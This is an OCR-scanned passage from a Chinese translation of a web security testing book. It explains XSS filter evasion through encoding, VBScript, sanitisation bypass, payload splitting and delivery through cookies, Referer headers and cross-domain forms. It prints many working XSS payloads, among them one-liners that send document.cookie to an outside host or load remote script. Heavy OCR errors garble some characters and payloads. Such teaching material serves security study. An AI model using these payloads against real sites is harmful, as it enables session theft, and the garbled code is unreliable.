中 包含 的 JavaScript。 在 下 面 的 示例 中 ，alert 中 的 e 字 符 使 用 Unicode 转 义 方 法 进行 了 转 义 ， 并 且 
Unicode 转 义 中 使 用 的 反 斜 线 经 过 了 HTML 编码 : 

<img onerror=eval ('alg&#x5c;u0065rt (1)') src=a> 

当然 ， 还 可 以 对 onerror 属 性 值 中 的 任何 其 他 字符 进行 HTML 编 码 ， 以 进一步 隐藏 攻击 : 


<imgdg onerror=&#tx65;&Hx76;&HX61l;&HXEOC; KH#HX28 ;KH#K27 ;al&txSc;uO0065rt&#x238;1& 
H#x29;&Hx27 ;HK29; Src=a> 
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使 用 这 种 技巧 可 以 避 开 许多 针对 JavaScript 代 码 的 过 滤 ， 因 为 可 以 避免 使 用 任何 JavaScript 关 
键 字 或 其 他 语法 ， 如 引号 、 句 号 和 括号 。 

v [LU VBScript 

常见 的 XSS 攻 击 通常 主 要 通过 JavaScript 来 实施 ， 但 是 ， 在 Internet Explorer 上， 还 可 以 使 用 
VBScript 语 言 。 该 语言 使 用 不 同 的 语法 和 其 他 属性 ， 攻 击 者 可 以 对 其 加 以 利用 ， 以 避 开 许多 仪 针 
对 JavaScript 的 输入 过 小 。 

可 以 通过 各 种 方式 插入 VBScript 代 码 ， 如 下 所 示 : 


<Script language=vbs>MsgBox 1</script> 





<imdg onerror="vbhs:MsgBox 1" src=a> 


<img onerror=MsgBox+1 language=vbs src=a> 

无 论 是 哪 一 种 情况 ， 都 可 以 使 用 vbscript ( 而 不 是 vbs ) 来 指定 语言 。 请 注意 ， 最 后 一 个 
示例 使 用 了 MsgBox+1， 以 避免 使 用 空白 和 从， 因而 也 不 需要 在 属性 值 周围 加 上 引号。 这 样 做 之 所 
以 可 行 ， 是 因为 +1 有 效 地 给 “ 空 日 ”加 上 了 数字 1， 因 此 表达 式 的 求 值 结果 为 1; 随后 ， 这 一 结 
条 被 传递 给 MsgBox 函 数 。 

值得 注意 的 是 ， 如 前 面 的 示例 所 示 ， 在 VBScript 中 ,一些 也 数 无 须 使 用 括号 即 可 调用 。 如 果 
过 滤 机 制 认 为 必须 使 用 括号 才能 访问 函数 ， 就 可 以 通过 使 用 VBScript 来 避 开 这 些 过 小。 

此 外 ， 与 JavaScript 不 同 ，VBScript 语 言 不 区 分 大 小 写 ， 因此， 可 以 在 所 有 关键 学 和 也 数 名 称 
中 使 用 大 写 和 小 写字 符 。 如 果 你 所 攻击 的 应 用 程序 另 数 会 修改 输入 的 大 小 写 , 如 将 其 转换 为 大 写 ， 
这 时 VBScript 就 特别 有 用 。 虽 然 应 用 程序 将 输入 转换 为 大 写 的 做 法 主要 是 出 于 功能 而 不 是 安全 考 
虑 ， 但 这 样 做 却 可 以 挫败 使 用 JavaScript 代 码 的 XSS 攻 击 ， 因 为 转换 为 大 写 后 ， 代 码 将 无 法 执行 。 
与 之 相反 ,使 用 VBScript 代 码 的 攻击 仍然 有 效 : 


<SCRIPT LANGUAGE=VBS>MSGBOX 1</SCRIPT> 
<IMG ONERROR="VBS:MSGBOX 1" SRC=A> 


v [LL JavasScript[ VBScript 
为 进一步 增加 攻击 的 复杂 程度 ， 并 避 开 某 些 过 滤 ， 可 以 从 JavaScript 中 调用 VBScript， 或 从 
VBScript 中 调用 JavaScript: 


<ScCript>execScript ("MsgBox 1",'"'vhscript"});</script> 
































<sScript language=vbs>execScript ("alert{(1})}")})</script> 
其 至 可 以 散 侄 这些 调用 ， 并 根据 需要 使 用 任何 一 种 语言 : 


<ScCript>execScript ('execScript 
"alert(1)","jJavascript"', "vhscript");</script> 


如 上 所 述 ，VBScript 不 区 分 大 小 写 ， 即 使 输入 被 转换 为 大 写 ， 你 的 代码 仍然 可 以 执行 。 在 这 
些 情况 下 ， 如果 你 确实 希望 调用 JavaSceript 函 数 ， 可 以 使 用 VBScript 中 的 字符 串 操 纵 函 数 用 所 需 的 
大 /小 写 构 建 一 个 命令 ， 并 使 用 JavaScript 执 行 该 命令 : 

<SCRIPT LANGUAGE=VBS>EXECSCRIPT(LCASE ("ALERT(1})")) </SCRIPT> 

<IMG ONERROR="VBS:EXECSCRIPT LCASE('ALERT(1)')'" SRC=A> 


“000000000 
在 Intemet Explorer 上， 可 以 使 用 Microsoft 的 定制 脚本 编码 算法 来 隐藏 肢 本 的 内 容 ， 从 而 如 开 





















































< 人、 \ Ny 

某 些 输入 过 滤 
<img onerror="VBScript.Encode: #8@~^CAAAAA-==\KoSK6, FoOOIAAA==^#~@" src=a> 
<img language="JScript.Encode" onerror="#@~^CAAAAA==C^+.D 8#mgIAAA== 人 ^#~@" 


这 种 编码 最 初 旨 在 用 于 防止 用 户 通 过 查看 HTML 页 面 的 源 代 码 来 轻松 访问 客户 端 脚本 。 此 
后 ， 该 算法 被 人 们 破解 ， 而 且 ， 可 以 通过 各 种 工具 和 网 站 来 解码 经 过 编码 的 脚本 。 通 过 Microsoft 
的 旧版 Windows 中 的 命令 行 实用 工具 srcenc， 你 可 以 对 目 己 的 脚本 进行 编码 ， 以 用 于 实施 攻击 。 

5. 避 开 净化 

当 尝 试 利 用 潜在 的 XSS 汤 洞 时 ， 避 开 净 化 可 能 是 所 有 障碍 中 最 为 常见 的 一 种 。 这 时 ， 应 用 程 
序 对 攻击 字符 串 执 行 菏 种 净化 或 编码 ， 使 其 变 得 无 害 ， 防 止 它 执行 JavaScript。 

对 传送 攻击 所 需 的 某 些 关键 字符 进行 HTML 编 码 ( 因此 < 变 成 slt;，> 变 成 ggt; ) 是 应 用 
程序 实行 数据 净化 最 第 见 的 做 法 。 其 他 情况 下 ,应 用 程序 可 能 会 完全 删除 茶 些 字符 或 表达 式 ， 试 
图 清除 输入 中 的 恶意 内 容 。 

如 果 遇 到 这 种 防御 , 首先 应 查 明 应 用 程序 阐 化 哪些 字符 与 表达 式 ， 以 及 是 否 仍然 可 通过 剩 下 
的 字符 实施 攻击 。 例 如 ， 如 打 输 入 的 数据 被 百 接 搬入 到 现 有 的 一 段 脚本 中 , 那么 可 能 不 需要 使 用 
任何 HIML 标 签字 符 。 或 者 ， 如 采 应 用 程序 从 输入 中 删除 <script> 标 签 ， 则 可 以 通过 适当 的 事 
件 处 理 程序 使 用 其 他 标签 。 这 时 , 测试 员 应 考虑 采用 之 前 介绍 的 用 于 避 开 基于 签名 的 过 滤 的 各 种 
技巧 ,包括 多 层 编码 、 空 字 节 、 非 标准 霹 法 以 及 经 过 模糊 处 理 的 脚本 代码 。 通 过 以 上 述 各 种 方式 
修改 输入 , 束 可 以 设计 出 不 包含 任何 被 过 渡 净 化 的 字符 或 表达 式 的 攻击 ,因而 能 够 成 功 避 开 过 小 。 

如 果 只 有 使 用 已 被 净化 的 输入 才能 实施 攻击 , 这 时 就 需要 测试 滔 化 过 小 的 效率 ,以 确定 是 否 
可 找到 任何 避 开 过 小 的 方法 。 

如 第 2 章 所 述 , 净化 过 滤 中 往往 存在 一 些 错误 。 一 些 字符 串 操 作 API 包 含 仅 替换 第 一 个 匹配 的 
表达 式 实 例 的 方法 ， 有 时 ， 这 些 方 法 易于 与 那些 符 换 所 有 实例 的 方法 相 混 消 。 因 此 ， 如 东 输 入 中 
的 <script> 钙 删除 ， 则 应 符 试 以 下 输入 ， 以 查看 是 否 所 有 实例 均 被 删除 : 

<Script><script>alert (1})}</script> 
在 这 种 情况 下 ， 还 应 检查 过 滤 是 否 以 递归 方式 执行 净化 : 

<Scr<script>ipt>alert (1})}</script> 

此 外 ,如 琳 过 小 对 输入 执行 多 个 净化 步 怠 ， 则 应 检查 是 否 可 以 对 这 些 步 又 之 间 的 顺序 或 相互 
关系 加 以 利用 。 例 如 ， 如 果 过 滤 递 归 删 除 <script>， 然 后 递归 删除 <object>， 以 下 攻击 或 许 
能 够 取得 成 功 : 

<Sscr<object>ipt>alert (1}</script> 

当 在 现 有 的 一 段 脚 本 中 注入 一 个 引用 字符 串 时 , 应 用 程序 经 常 在 注入 的 引号 字符 前 插入 反 斜 
线 字 符 。 应 用 程序 这 样 做 是 为 了 对 引号 进行 转 义 ,阻止 攻击 者 终止 字符 串 或 注入 任意 脚本 。 在 这 
种 情况 下 ,应 该 始终 核实 反 笠 线 字符 本 号 是 否 被 转 义 。 如 末 其 未 被 转 义 ,那么 这 种 过 滤 就 可 以 轻 
易 避 开 。 例 如 ， 如 来 能 够 控制 下 面 的 foo 值 : 
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Var 有 = 'foo': 
那么 就 可 以 注入 


faov rs Slert(l)lr7y 

这 段 代 人 码 生成 如 下 啊 应 ， 其 中 含有 受 控制 的 脚本 。 注 意 ， 必 须 使 用 JavaScript 注 释 符 号 / /将 
剩 下 的 脚本 作为 注释 处 理 ， 防 止 应 用 程序 目 己 的 字符 串 分 隔 符 造成 语法 错误 。 

Var a = 'foo\\'; alert(1);// 


如 果 发 现 反 斜 线 字 = 符 被 正确 转 义 ， 但 尖 括 号 却 按 原样 返回 ， 那么 攻击 者 可 以 使 用 以 下 攻击 字 











</script><script>alert (1)</script> 

这 样 做 可 废弃 应 用 程序 中 原来 的 脚本 ， 并 在 其 后 注入 一 段 新 的 脚本 。 攻 击 之 所 以 能 够 成 功 ， 
是 因为 浏览 需 在 解析 植 人 的 JavaScript 之 前 ， 优 先 解析 HTML 标 签 

<aCriptsvar a  '*/gcript><scocript>salert(l)<raoript> 

此 时 ， 虽 然 原 来 的 脚本 中 包含 一 个 错误 ,但 这 无 天 紧要 ， 因 为 训 览 硕 会 跳 过 这 个 错误 ， 继 乡 
执行 注入 的 脚本 。 


尝试 访问 
http://mdsec.net/search/48/ 
http://mdsec.net/search/52/ 











提示 在 前 面 的 两 个 攻击 中 ， 即 使 攻击 者 能 够 控制 一 段 肢 本 ,但 由 于 应 用 程序 对 单 引 


本 号 或 双 引 号 进行 了 转 义 ， 他 也 无 法 使 用 它们 ,但 可 以 使 用 String.fromCharCode 技 
巧 ， 不 用 分 隔 符 创建 字符 囊 。 





如 果 注 入 的 脚本 位 于 事件 处 理 程序 之 内 ， 而 非 完 整 的 脚本 块 ， 则 可 以 对 引号 进行 HTML 编 
人 码 ， 以 避 开 应 用 程序 的 净化 ， 并 使 受 控 制 的 字符 串 免 于 被 过 滤 。 例 如 ， 如 果 可 以 控制 以 下 输入 
中 的 foo 值 : 














<a href="#" onclick="var a = 'foo'; 
并 且 应 用 程序 正确 转 义 输入 中 的 引号 和 反 侠 线 ， 则 可 以 成 功 实施 以 下 攻击 ， 
foo&kapos;; alert(1);// 


这 导致 以 下 响应 ， 由 于 一 些 浏览 带 在 将 事件 处 理 程 序 作为 JavaScript 执 行 之 前 会 执行 HTML 
解 公 ， 因 此 该 攻击 取得 成 功 : 
<a href="#" onclick='"Vvar a = 'foo&kapos;; alert(1);//'; ... 


应 对 用 户 输 入 进行 HTML 编 码 来 防范 XSS 攻 击 ， 对 于 这 一 常规 建议 ， 应 注意 以 下 事实 : 在 作 
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为 JavaSrcipt 执 行 之 前 ， 事 件 处 理 需 会 被 HTML 解码 。 在 这 种 情况 下 ， 进 行 HIML 编 码 并 不 一 定 能 
够 阻止 攻击 。 攻 击 者 甚至 可 以 利用 这 种 方法 避 开 其 他 防御 机 制 。 

6. 突破 长 度 限制 

当 应 用 程序 把 输入 截 短 为 一 个 固定 的 最 大 长 度 时 ， 有 三 种 建立 攻击 字符 串 的 方法 。 

第 一 种 相当 明显 的 方法 是 尝试 使 用 最 短 可 能 长 度 的 JavaScriptAPI， 删 除 那 些 通 党 包含 在 内 但 
并 不 完全 必要 的 字符 ， 缩 短 攻击 有 效 载荷 。 例 如 ， 如 果 注 入 现 有 的 一 段 代 码 ， 下 面 的 28 字 节 命 
令 将 把 用 户 的 cookie 传 送 至 主机 名 为 a 的 服务 入 。 

open{"//a/"+document .cookie) 

另外 ， 如 果 直 接 注 入 HTML， 那 么 下 面 这 个 30 字 节 的 标签 将 从 主机 名 为 a 的 服务 器 加 载 并 执 
行 一 段 脚本 。 

<Script src=http://a></script> 

在 因特网 上 ， 这些 示例 明显 需要 进行 扩展 ,在 其 中 包含 一 个 有 效 的 域名 或 PP 地址 。 但是， 内 
部 企业 网 络 实 际 有 可 能 使 用 一 台 WINS 名 为 a 的 机 器 作为 接收 服务 姨 。 























提示 可 以 使 用 Dean Edward 的 JavaScript packer 工 具 ( 见 http://dean.edwards.name/ 


ed packer/ ) 删除 不 必要 的 空白 符 ， 尽 可 能 地 缩短 某 一 段 脚 本 。 这 个 工具 还 可 将 脚本 转换 
成 单独 一 行 ， 方 便 播 入 到 一 个 请 求 参 数 中 。 








第 二 种 更 加 强大 的 突破 长 度 限制 的 技巧 是 将 一 个 攻击 有 效 载 傈 分 布 到 几 个 不 同 的 位 置 , 用 户 
控制 的 输入 在 这 里 插入 到 同一 个 返回 页 面 中 。 以 下 面 的 URL 为 例 : 
https://wahh-app.com/account .php?page_ id=244&seed=129402931&mode=normal 
它 将 返回 一 个 包含 以 下 内 容 的 页 面 : 
<input type="hidden' name="page id" value="244"> 


<input type="hidden" name="seed" value="129402931"> 
<input type="hidden" name="mode" wvalue="normal'"> 


假设 应 用 程序 对 每 个 字段 实施 了 长 度 限制 , 以 阻止 在 其 中 插入 有 效 的 攻击 字符 串 。 但 是 攻击 者 
仍然 可 以 使 用 以 下 URL 将 一 段 脚本 分 布 到 他 所 控制 的 三 个 位 置 ， 从 而 传送 一 个 有 效 的 攻击 字符 串 : 


https://myapp.com/account .php?page 1id="><script>/*&seed-=*/alert (document 























.Cookie);/*&mode=*/</script> 


这 个 URL 的 参数 值 植 入 到 页 面 中 后 ， 生 成 如 下 脚本 : 


<input type="hidden" name="page id" value=""><script>/*'"> 
<input type="hidden" name="seed" value="*/alert (document .cookie);/*"> 
<input type="hidden" name="mode" value="*/</gcript>"> 


最 终 得 到 的 HTML 完 全 有 效 , 等 同 于 加 粗 显示 的 部 分 。 其 中 的 源 代 码 块 已 成 为 JavaScript 注 释 
(包含 在 /* 与 */ 之 则 )， 因 此 被 浏览 副 忽 略 。 这 样 ， 注 入 的 脚本 被 执行 ， 就 好 像 它 被 完 整地 插入 
到 页 面 的 某 一 个 位 置 一 样 。 
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提示 “这 种 将 一 个 攻击 有 效 载 荷 分 布 到 几 个 字段 中 的 技巧 ， 有 时 还 可 用 于 避 开 其 他 类 
J 型 的 防御 过 滤 。 应 用 程序 经 常 对 单独 一 个 页 面 的 不 同 字 段 执 行 不 同 的 数据 确认 与 净化 。 
在 前 面 的 示例 中 ,假设 bage _ id 与 mod 参 数 的 最 大 长 度 为 12 个 字符 。 由 于 这 些 字 段 如 
此 地 短 ， 因 此 应 用 程序 的 开发 者 没有 对 其 实施 任何 XSS 过 滤 。 另 一 方面 ，seed 参 数 的 


长 度 没有 限制 ， 因 此 应 用 程序 对 其 实施 严格 的 过 滤 ， 以 防止 攻击 者 在 其 中 注入 "< 或 > 
字符 。 在 这 种 情况 下 ， 尽 管 开 发 者 实施 了 过 滤 ， 但 攻击 者 不 使 用 任何 被 阻止 的 字符 ， 
仍然 能 够 在 seedq 参 数 中 插入 一 段 任 意 长 度 的 脚本 ， 因 为 注入 到 周围 字段 中 的 数据 可 以 
建立 JavaScript 环 境 。 








第 三 种 在 某 些 情况 下 非常 有 效 的 窒 破 长 度 限 制 的 技巧 是 ， 将 一 个 反射 型 XSS 漏 洞 “转换 ”成 
一 个 基于 DOM 的 漏洞 。 例 如 , 在 最 初 的 反射 型 XSS 漏 洞 中 , 如 果 应 用 程序 对 复制 到 返回 页 面 中 的 
message 人 参数 设置 长 度 限 制 , 那么 就 可 以 注入 以 下 45 字 节 的 脚本 , 它 对 当前 UREL 中 的 片断 字符 串 
( fragment string ) 求 值 。 











<script>eval (location.hash.slice{1))})</script> 

通过 在 匈 于 受到 反射 型 XSS 攻 击 的 参数 中 注入 这 段 脚本 , 可 以 在 生成 的 页 面 中 造成 一 个 基于 
DOM 的 XSS 漏 洞 ， 从 而 执行 位 于 片断 字符 串 中 的 另 一 段 脚 本 , 它 不 受 应 用 程序 过 滤 的 有 影响, 可 为 
任意 长 度 。 例 如 : 


http://mdsec.net/error/S/Error.ashx?message-=-<script>eval {location.hash 

















.Substr(1)})</script>#alert('long script here ...... ') 
以 下 为 上 述 示例 的 较 短 版 本 ， 此 示例 在 多 数 情 况 下 可 以 运行 : 


http://mdsec.net/error/S5/Error.ashx?message=<script>eval (unescape (location)’ 








</script>#%0Aalert ('long script here ...... ') 

在 这 个 版 本 中 ， 整 个 URL 经 过 URL 人 解码 ， 然 后 传递 给 eval 命 令 。 整 个 URL 将 作为 有 效 的 
JavaScript 执 行 ， 因 为 http :协议 击 级 作为 代码 标签 ， 协议 前 级 后 面 的 // 则 作为 单行 注释 ，%0A 经 
过 URL 解 码 后 将 变 为 换行 符 ， 表 示 结 束 注释 。 

7. 实施 有 效 的 XSS 攻 击 

通 负 ， 在 探查 洪 在 的 XSS 调 洞 ， 以 了 解 并 避 开 应 用 程序 的 过 滤 机 制 时 ， 你 往往 是 在 浏览 硕 以 
外 进行 测试 ， 也 就 是 使 用 Burp Repeater 之 类 的 工具 重复 发 送 相同 的 请 求 ， 每 次 对 请 求 进行 略微 修 
改 ， 然 后 测试 这 种 修改 对 啊 应 的 影响 。 某 些 情 况 下 ,在 以 这 种 方式 创建 概念 验证 攻击 后 ， 你 可 能 
还 需要 完成 任务 才能 针对 其 他 应 用 程序 用 户 实施 有 效 攻 击 。 例 如 ,其 他 用 户 的 请 求 中 的 XSS 进 入 
点 ( 如 cookie 或 Referer 消 奶头 ) 可 能 难以 控制 ; 或 者 目标 用 户 可 能 使 用 的 是 内 置 了 防范 反射 型 
XSS 攻 击 功 能 的 浏览 希 。 在 这 一 节 中 ， 我 们 将 介绍 你 在 实施 有 效 的 XSS 攻 击 时 可 能 遇 到 的 各 种 挑 
战 及 如 何 应 对 这 些 挑战 。 

e000000000000 

假如 你 所 确定 的 漏洞 位 于 你 不 感 兴趣 的 应 用 程序 区 域 , 只 影响 未 经 过 验证 的 用 户 , 而 其 他 区 
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域 则 包含 真正 敏感 的 数据 和 你 希望 攻破 的 功能 。 2 

通常 ， 在 这 种 情况 下 ,设计 一 个 可 以 通过 应 用 程序 的 某 个 区 域 中 的 XSS 源 洞 传送 ， 并且 在 用 
户 的 训 览 关中 持续 存在 的 攻击 有 效 载 千 ， 就 可 以 攻破 同一 个 域 中 的 目标 数据 或 功能 。 

要 实现 上 述 目 的 , 一 个 简单 的 办 法 是 创建 一 个 包含 整个 浏览 需 窗 口 的 过 ame, 然后 在 该 iframe 
中 重新 加 载 当 前 页 面 。 在 用 户 浏览 站 点 并 登录 到 通过 验证 的 区 域 时 , 注入 的 脚本 将 始终 在 顶层 窗 
口中 运行 。 这 样 ， 你 就 能 够 钓 住 子 iframe 中 的 导航 事件 和 表单 提交 ， 监 视 iframe 中 显示 的 所 有 啊 
应 内 容 ， 当 然 也 能 够 在 适当 的 时 候 支持 用 户 的 会 话 。 在 文 持 HTMLS 的 浏览 硕 中 ， 当 用 户 在 页 面 
间 移 动 时 ， 脚 本 甚至 可 以 使 用 window.history.pushState() 困 数 在 地 址 栏 中 设置 适当 的 
URL。 

请 参阅 以 人 URL 了解 这 种 攻击 的 一 个 示例 : 

http://blog.kotowicz.net/2010/11/xss-track-how-to-quietly-track-whole.html 














© 错误 观点 “我 们 不 用 担心 站 点 中 未 通过 验证 部 分 的 XSS 漏 洞 ， 攻 击 者 不 可 能 利用 它 
们 来 劫持 会 话 。 


为 两 方面 的 原因 ， 这 种 看 法 并 不 正确 。 首 先 ， 应 用 程序 未 通过 验证 部 分 的 XSS 
漏洞 可 被 攻击 者 用 于 直接 攻破 验证 用 户 的 会 话 。 因 此 ， 未 通过 验证 部 分 的 反射 型 XSS 


漏洞 比 通过 验证 部 分 的 这 类 漏洞 更 严重 ， 因 为 潜在 受害 者 的 范围 更 广 。 其 次 ， 即 使 用 
户 尚未 通过 验证 ， 攻 击 者 仍然 可 以 通过 提交 几 个 请 求 ， 在 受害 者 的 浏览 器 中 注入 某 种 
木马 功能 ， 等 待 用 户 登 录 ， 然 后 劫持 用 户 的 会 话 。 如 第 13 章 所 述 ， 攻 击 者 甚至 可 能 会 
使 用 以 JavaScript 编 写 的 键盘 记录 器 来 捕获 用 户 的 密码 。 
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假如 你 确定 的 XSS 漏 洞 使 用 PosT 请 求 , 但 实施 攻击 的 最 便捷 的 方法 需要 使 用 cET 请 求 一 一 例 
如 ， 提 交 一 个 论坛 贴 子 ， 其 中 包含 针对 易 受 攻击 的 URL 的 IMG 标 签 。 

在 这 种 情况 下 , 我 们 有 必要 进行 判定 ， 如 果 将 PosT 请 求 转换 为 GET 请求 ， 应 用 程序 是 否 对 请 
求 进行 相同 的 处 理 。 许 多 应 用 程序 接受 以 上 任何 一 种 请 求 。 

在 Burp Proxy 中 ， 可 以 使 用 上 下 文 荣 单 中 的 “更 改 请 求 方法 ”( Change Request Method ) 命令 
将 任何 请 求 在 GET 与 PosT 方 法 之 间 切 换 。 


二 

















错误 观点 ““ 这 个 XSS 漏 洞 无 法 被 利用 。 因 为 攻击 者 无 法 通过 GET 请 求实 施 攻击 。 
如 果 一 个 反射 型 XSS 漏 洞 只 能 使 用 PoST 方 法 加 以 利用 ， 应 用 程序 仍然 会 受到 各 种 





攻击 传送 机 制 的 影响 ， 包 括 使 用 恶意 第 三 方 Web 站 点 的 传送 机 制 。 





有 时, 把 使 用 GE 方法 的 攻击 转换 成 使 用 PosT 方 法 的 攻击 可 能 会 避 开 某 些 过 滤 。 许 多 应 用 程 
序 在 整个 应 用 程序 中 执行 某 种 常规 过 泪 , 阻止 已 知 的 攻击 字符 串 。 如 果 一 个 应 用 程序 希望 收 到 使 
用 GET 方 法 的 请 求 , 它 可 能 只 对 URL 查 询 字 符 串 执行 这 种 过 滤 。 将 请 求 转换 为 使 用 PosT 方 法 就 可 
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一 些 应 用 程序 包含 反射 型 XSS 漏 洞 , 攻击 这 种 漏洞 的 进入 点 在 请 求 cookie 中 。 在 这 种 情况 下 ， 
可 以 通过 各 种 技巧 来 利用 这 种 漏洞 : 

口 和 修改 请 求 一 样 ， 应 用 程序 可 能 允许 你 使 用 与 cookie 同 名 的 URL 或 主体 参数 来 触发 漏洞 。 

口 如 果 应 用 程序 包含 任何 可 用 于 直接 设置 cookie 值 的 功能 (例如 ， 基 于 提交 的 参数 值 设 置 

cookie 的 首选 项 页 面 )， 则 你 可 以 设计 一 个 路 站 点 请 求 伪 造 攻 击 ， 在 受害 者 的 训 览 套 中 设 
置 所 需 的 cookie。 然后 , 再 谤 使 受害 者 提出 以 下 两 个 请 求 : 其 中 一 个 请 求 用 于 设置 包含 XSS 
有 效 载 傈 所 需 的 cookie， 另 一 个 请 求 则 用 于 请 求 以 危险 的 方式 处 理 cookie 值 的 功能 。 

口 之 前 ， 人 们 已 经 在 浏览 器 扩展 技术 ( 如 Flash ) 中 发 现 各 种 漏洞 ， 这 使 攻击 者 可 以 使 用 任 
童 HTTP 消 息 尖 提交 跨 域 请 求 。 当 前 ,至少 有 一 种 此 类 漏洞 广为人知 , 但 尚未 修复 。 因 此 ， 
可 以 利用 浏览 间 插 件 中 的 某 个 这 种 类 型 的 漏洞 来 提交 跨 域 请 求 ， 在 其 中 包含 任意 则 在 触 
发 漏洞 的 cookie 消 息 头 。 

口 如 末 上 述 任何 方法 都 无 法 成 功 实施 攻击 ， 你 可 以 利用 相同 〈 或 相关 ) 域 中 的 任何 其 他 反 
射 型 XSS 漏 洞 使 用 所 需 值 设 置 一 个 永久 性 cookie， 持 续 对 受害 用 户 进行 攻击 。 
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一 些 应 用 程序 包含 只 能 通过 Referer 消 息 头 触发 的 XSS 漏 洞 。 利 用 受 他 们 控制 的 Web 服 务 怖 ， 
攻击 者 可 以 相当 轻松 地 利用 这 些 漏洞 。 例 如 , 攻击 者 可 以 刻 使 受害 者 请 求 他 们 的 服务 大 上 的 URL， 
该 URL 中 包含 针对 易于 攻击 的 应 用 程序 的 适当 XSS 有 效 载 位 。 然后， 攻击 者 的 服务 器 将 返回 一 个 
响应 ， 以 请 求 上 述 URL， 而 攻击 者 的 有 效 载 何 就 包含 在 此 请 求 的 Referer 消 晨 尖 中 。 

在 某 些 情况 下 ， 只 有 在 Referezr 消 息 头 包含 与 邹 受 攻击 的 应 用 程序 同属 一 个 域 的 URL 时 ， 
XSS 源 洞 才 会 触发 。 这 时 ， 可 以 利用 应 用 程序 中 的 任何 现成 的 重 定 问 功能 来 实施 攻击 。 为 此 ， 你 
需要 构建 一 个 指 癌 该 重 定 癌 功 能 的 URL， 在 其 中 包含 XSS 攻 击 的 有 效 载 集 ， 并 使 其 重 定 问 到 易于 
攻击 的 URL。 这 种 攻击 能 否 成 功 ,， 取决 于 该 功能 使 用 的 重 定 癌 方法 ,以 及 当前 浏览 各 在 进行 上 述 
重 定 问 时 是 否 会 更 新 Referer 消 息 头 。 
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目前 ， 有 越 来 越 多 的 复杂 应 用 程序 采用 不 包含 传统 的 请 求 参数 的 Ajax 请 求 。 而 在 此 前 ， 请 求 
通 稍 包含 XML 和 JSON 格 式 的 数据 ， 或 采用 各 种 序列 化 方案 。 因 此 ， 针 对 这 些 请 求 的 啊 应 往往 包 
合同 种 或 其 他 格式 的 数据 ， 而 不 是 HTML。 

与 这 些 请 求 和 响应 相关 的 服务 右 问 功能 大 多 会 表现 出 类 似 于 XSS 的 行为 。 正 常情 况 下 ， 应 用 
程序 会 按 原样 返回 表明 漏洞 确实 存在 的 请 求 有 效 载 傈 。 

在 这 种 情况 下 ， 仍 然 可 以 利用 这 种 行为 来 实施 XSS 攻 击 。 为 此 ， 需 要 满足 以 下 两 个 条 件 : 

口 你 需要 想 办 法 使 目标 用 户 提出 所 需 的 路 域 请 求 ; 

口 你 需要 以 某 种 方式 操纵 啊 应 ， 以 便 它 在 到 达 浏 览 硕 时 执行 你 的 脚本 。 

满足 这 两 个 条 件 并 不 容易 。 首 移 ， 相 关 请 求 通 浓 由 JavaScript 使 用 XMLHttpRequest 提 出 《请 
参阅 第 3 革 了 解 详细 信息 )。 默 认 情 况 下 ， 这 种 方法 并 不 能 用 于 提出 路 域 请 求 。 虽 然 HTML5 正 在 对 
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XMLHttpRequest 进 行 修改 ， 以 便于 站 点 指定 其 他 可 能 与 它们 交互 的 域 , 但 是 ， 如 果 你 能 够 找到 
允许 第 三 方 交互 的 目标 ， 就 可 以 采用 更 简单 的 方法 来 攻破 该 目标 ( 请 参阅 第 13 曹 了解 详细 信息 )。 

其 次 , 在 任何 攻击 中 ,应 用 程序 返回 的 啊 应 均 由 受害 者 的 浏览 右 直 接 人 处理， 而 不 是 由 定制 脚 
本 按 原样 处 理 。 因 此 ， 响 应 将 包含 任何 非 HTML 格 式 的 数据 (通常 使 用 对 应 的 content-Type 消 
息 头 )。 在 这 种 情况 下 ， 浏 览 需 会 以 针对 这 种 数据 类 型 (如 果 它 识别 该 类 型 ) 的 方式 正常 处 理 啊 
应 ， 因 而 通过 HTML 注 入 脚本 代码 的 常用 方法 也 可 能 会 失效 。 

尽管 难以 实现 , 但 在 某 些 情况 下 我 们 仍然 可 以 满足 这 两 个 条 件 ， 从 而 利用 类 似 于 XSS 的 行 ; 
来 实施 有 效 攻击 。 下 面 我 们 将 举例 说 明 如 何 使 用 XML 数 据 格式 来 实施 攻击 。 
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使 用 HTML 表 单 (将 enctype 属 性 设置 为 Lext/plain ) 可 以 在 HTTP 请 求 主体 中 跨 域 传送 几 
乎 任何 数据 。 这 将 告诉 浏 览 融 按 以 下 方式 处 理 表单 参数 : 

口 在 请 求 中 隔行 传送 每 个 参数 ; 

口 使 用 等 号 分 隔 每 个 参数 的 名 称 和 值 ( 和 平常 一 样 ); 

口 不 对 参数 名 称 或 值 进行 任何 URL 编 码 。 

虽然 某 些 浏览 器 并 不 遵循 这 种 规 冰 ,但 当前 版 本 的 Internet Explorer、Firefox 和 Opera 都 采用 
这 种 规范 。 

上 述 行为 意味 着 ,只 要 数据 中 至 少 包含 一 个 等 号 ,你 就 可 以 在 消息 主体 中 传送 任意 数据 。 为 
此 , 你 需要 将 数据 分 隔 成 两 块 ,等 号 前 一 块 , 等 号 后 一 块 。 然后 , 将 第 一 块 数据 放 在 参数 名 称 中 ， 
将 第 二 块 数据 放 在 参数 值 中 。 这 样 , 浏览 器 在 构建 请 求 时 ， 它 会 传送 以 等 号 分 隔 的 两 块 数 据 ， 因 
而 实际 上 构建 了 所 需 的 数据 。 

由 于 XML 在 起 始 XML 标 签 的 version 属 性 中 始终 至 少 包 含 一 个 等 所， 因此 ， 我 们 可 以 在 消 
息 主 体 中 使 用 这 种 技巧 跨 域 传送 任意 数据 。 例 如 ， 如 有 果 所 需 的 XML 如 下 所 示 : 

al Ae Od en en a 

则 可 以 使 用 以 下 表单 发 送 这 些 数 据 : 

<form enctype="text/plain" action="http://wahh-app.com/ vuln.php" 


method="POST"> 
<input type="hidden" name='<?iWml version.' 









































value= "1.0"?><data><param>foo</param></data>'> 
</form><script>document.forms[0] .submit();</script> 


要 在 baram 参 数 的 值 中 包含 常用 的 攻击 字符 ,如 标签 尖 括 号 , 你 需要 在 XML 请 求 中 对 这 些 字 
符 进 行 HTML 编码 。 因 此 ， 在 生成 该 请 求 的 HTML 表 单 中 ， 你 需要 对 它们 进行 双重 HTML 编码 。 











提示 “只 要 你 能 够 将 等 号 合并 到 请 求 中 的 某 个 位 置 ， 就 可 以 使 用 这 种 技巧 跨 域 提交 几 
Y 乎 包 念 任何 类 型 的 内 容 (如 JSON 编 码 的 数据 和 序列 化 二 进 制 对 象 ) 的 请 求 。 通 常 ， 通 
过 修改 请 求 中 可 以 包含 等 号 字符 的 自由 格式 的 文本 字段 即 可 达到 这 一 目的 。 例 如 ,在 


